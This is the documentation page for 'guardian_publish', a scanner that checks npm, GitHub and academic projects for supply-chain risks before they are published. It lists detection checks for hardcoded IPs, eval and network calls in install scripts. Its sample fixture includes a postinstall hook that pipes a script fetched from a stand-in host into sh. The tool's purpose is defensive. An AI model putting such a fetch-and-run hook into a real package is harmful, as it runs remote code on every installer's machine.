
guardian_publish


Pre-publish supply chain verification. Catches hardcoded IPs, obfuscated code, dangerous install scripts, binary files, and credential leaks before they reach production. Six profiles for different publishing contexts.

CAPABILITIES

10 Supply Chain Checks

Guardian Publish scans your project directory for the most common supply chain attack vectors. Each check is classified by severity—CRITICAL, HIGH, or MEDIUM—and a BLOCKED verdict stops compromised packages from publishing.

Use the .50c-security.json allowlist for project-level overrides when you have known safe patterns that would otherwise trigger findings.

no_hardcoded_ips — detects IPv4/IPv6 addresses embedded in source code

no_obfuscated_code — flags base64 blobs, hex-encoded strings, char code arrays

no_suspicious_urls — catches external URLs in unexpected locations

no_dangerous_scripts — flags preinstall/postinstall scripts that run arbitrary code

no_binary_files — detects compiled binaries or executables in the package

no_env_leaks — catches .env files, API keys, tokens, and secrets in source

no_network_calls — flags fetch/http/net calls in install-time code

no_dynamic_requires — detects eval(), Function(), and dynamic require() patterns

no_minified_without_source — flags minified files lacking corresponding source maps

npm_diff_check — compares published package against source for injected code

Severity Levels

CRITICAL Immediate threat. Blocks publishing.
HIGH Serious concern. Manual review required.
MEDIUM Worth investigating. May be intentional.

6 Verification Profiles

npm, github, arxiv, medical, science, math

Each profile tailors checks to the publishing context. Academic profiles (arxiv, medical, science, math) use AI tools for content verification.

EXAMPLE

Scan Before Publishing to npm

MCP Tool Call

// Request

{
  "name": "guardian_publish",
  "arguments": {
    "profile": "npm",
    "save_receipt": true
  }
}

// Response

{
  "verdict": "BLOCKED",
  "supply_chain": {
    "checks_run": 10,
    "passed": 8,
    "failed": 2,
    "findings": [
      {
        "check": "no_hardcoded_ips",
        "severity": "CRITICAL",
        "file": "lib/config.js",
        "line": 47,
        "detail": "IPv4 address 185.143.xx.xx found"
      },
      {
        "check": "no_dangerous_scripts",
        "severity": "HIGH",
        "file": "package.json",
        "detail": "postinstall script runs curl"
      }
    ]
  },
  "receipt": "guardian-receipt-2026-03-03.md"
}

CLI Usage

Terminal

# Scan current directory with npm profile

npx 50c guardian-publish --profile npm

# Scan for GitHub release

npx 50c guardian-publish --profile github

# Academic paper verification

npx 50c guardian-publish --profile arxiv --save-receipt

# Scan a specific directory

npx 50c guardian-publish --cwd ./packages/core --profile npm

Allowlist Configuration

.50c-security.json
{
  "allowlist": {
    "ips": ["127.0.0.1", "::1"],
    "urls": ["https://registry.npmjs.org"],
    "files": ["vendor/legacy.min.js"]
  }
}
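To make the allowlist semantics concrete, here is an added illustration of two of the checks listed above (no_hardcoded_ips and no_dangerous_scripts) applied to constructed sample files with a .50c-security.json-style allowlist. It is example code written for this page, not guardian_publish's own implementation; the REVIEW and PASSED verdict names, the hook list and the curl/wget pattern are assumptions of the example.

```javascript
// Added example: a miniature of no_hardcoded_ips + no_dangerous_scripts with
// allowlist handling. Not guardian_publish's code; verdicts other than BLOCKED
// are this example's own assumption.
const ALLOWLIST = { ips: ["127.0.0.1", "::1"], urls: [], files: [] };

// Constructed sample inputs standing in for files on disk.
const SAMPLE_FILES = {
  "lib/config.js": 'const api = "http://203.0.113.7:8080";\nconst local = "127.0.0.1";\n',
  "package.json": JSON.stringify({
    name: "demo", version: "1.0.0",
    scripts: { postinstall: "curl -s https://example.invalid/s.sh | sh", test: "node test.js" },
  }),
};

const IPV4 = /\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b/g;
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"]; // assumed set
const NET_TOOLS = /\b(curl|wget)\b/; // assumed download-tool pattern

// no_hardcoded_ips: every IPv4 literal not on the allowlist is a CRITICAL finding.
function checkHardcodedIps(file, text, allow) {
  const findings = [];
  text.split("\n").forEach((lineText, i) => {
    for (const m of lineText.matchAll(IPV4)) {
      if (allow.ips.includes(m[0])) continue;
      findings.push({ check: "no_hardcoded_ips", severity: "CRITICAL", file, line: i + 1,
        detail: `IPv4 address ${m[0]} found` });
    }
  });
  return findings;
}

// no_dangerous_scripts: an install-time hook that runs a network download is HIGH.
function checkDangerousScripts(file, text) {
  const scripts = JSON.parse(text).scripts || {};
  return INSTALL_HOOKS.filter((h) => scripts[h] && NET_TOOLS.test(scripts[h]))
    .map((h) => ({ check: "no_dangerous_scripts", severity: "HIGH", file,
      detail: `${h} script runs ${NET_TOOLS.exec(scripts[h])[1]}` }));
}

// Run both checks over the file map; allowlisted files are skipped entirely.
// Any CRITICAL finding gives BLOCKED; HIGH-only gives REVIEW; none gives PASSED.
function scan(files, allow) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    if (allow.files.includes(file)) continue;
    if (file.endsWith("package.json")) findings.push(...checkDangerousScripts(file, text));
    else findings.push(...checkHardcodedIps(file, text, allow));
  }
  const verdict = findings.some((f) => f.severity === "CRITICAL") ? "BLOCKED"
    : findings.length ? "REVIEW" : "PASSED";
  return { verdict, findings };
}
```

Running scan(SAMPLE_FILES, ALLOWLIST) reports the 203.0.113.7 literal and the postinstall curl, while the allowlisted 127.0.0.1 produces no finding.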

USE CASES

Stop Supply Chain Attacks Before They Ship

npm Package Publishing

Run before every npm publish. Catches injected IPs, eval backdoors, and credential leaks that automated scanners miss.

GitHub Release Validation

Verify your release artifacts are clean before tagging. Detect binaries, minified code without source maps, and suspicious URLs.

Academic Paper Submission

Use arxiv, medical, science, or math profiles to verify academic content with AI-powered checks before submission.

CI/CD Gate

Add as a pre-publish step in your CI pipeline. A BLOCKED verdict exits non-zero, halting the release automatically.

Monorepo Scanning

Point at individual packages within a monorepo using the cwd parameter. Scan each package independently before publish.

Audit Trail

Generate detailed receipts documenting every check, finding, and verdict. Attach to release notes or compliance records.

Never Publish a Compromised Package

Guardian Publish is free for all 50c users. 10 supply chain checks, 6 profiles, zero cost.
